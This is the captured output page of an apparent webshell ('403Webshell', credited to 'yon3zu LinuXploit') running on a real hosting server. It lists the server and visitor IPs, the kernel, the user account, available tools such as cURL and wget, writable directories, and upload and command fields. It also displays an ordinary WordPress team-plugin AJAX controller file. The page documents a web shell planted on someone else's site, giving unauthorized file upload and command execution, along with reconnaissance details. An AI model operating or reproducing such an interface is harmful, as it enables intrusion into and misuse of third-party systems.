403Webshell
Server IP : 213.136.93.164  /  Your IP : 216.73.217.84
Web Server : Apache
System : Linux m14200.contabo.net 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64
User : ki692510 ( 1047)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/home/ki692510/www/wp-content/plugins/tlp-team/app/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/ki692510/www/wp-content/plugins/tlp-team/app/Controllers//AjaxController.php
<?php
/**
 * Ajax Controller Class.
 *
 * @package RT_Team
 */

namespace RT\Team\Controllers;

use RT\Team\Controllers\Admin\Ajax as AdminAjax;
use RT\Team\Controllers\Frontend\Ajax as FrontendAjax;
use RT\Team\Abstracts\Controller;

// Do not allow directly accessing this file.
if ( ! defined( 'ABSPATH' ) ) {
	exit( 'This script cannot be accessed directly.' );
}

/**
 * Ajax Controller Class.
 */
class AjaxController extends Controller {
	use \RT\Team\Traits\SingletonTrait;

	/**
	 * Ajax.
	 *
	 * @var array
	 */
	private $ajax = [];

	/**
	 * Classes to include.
	 *
	 * @return array
	 */
	public function classes() {
		$this->admin_ajax()->frontend_ajax();

		return $this->ajax;
	}

	/**
	 * Admin Ajax
	 *
	 * @return Object
	 */
	private function admin_ajax() {
		$this->ajax[] = AdminAjax\Skill::class;
		$this->ajax[] = AdminAjax\Social::class;
		$this->ajax[] = AdminAjax\Preview::class;
		$this->ajax[] = AdminAjax\Settings::class;
		$this->ajax[] = AdminAjax\Shortcode::class;
		$this->ajax[] = AdminAjax\ProfileImage::class;
		$this->ajax[] = AdminAjax\DefaultFilter::class;

		return $this;
	}

	/**
	 * Frontend Ajax
	 *
	 * @return Object
	 */
	private function frontend_ajax() {

		$this->ajax[] = FrontendAjax\SmartPopup::class;
		$this->ajax[] = FrontendAjax\MultiPopup::class;
		$this->ajax[] = FrontendAjax\SinglePopup::class;
		$this->ajax[] = FrontendAjax\SpecialLayout::class;

		return $this;
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit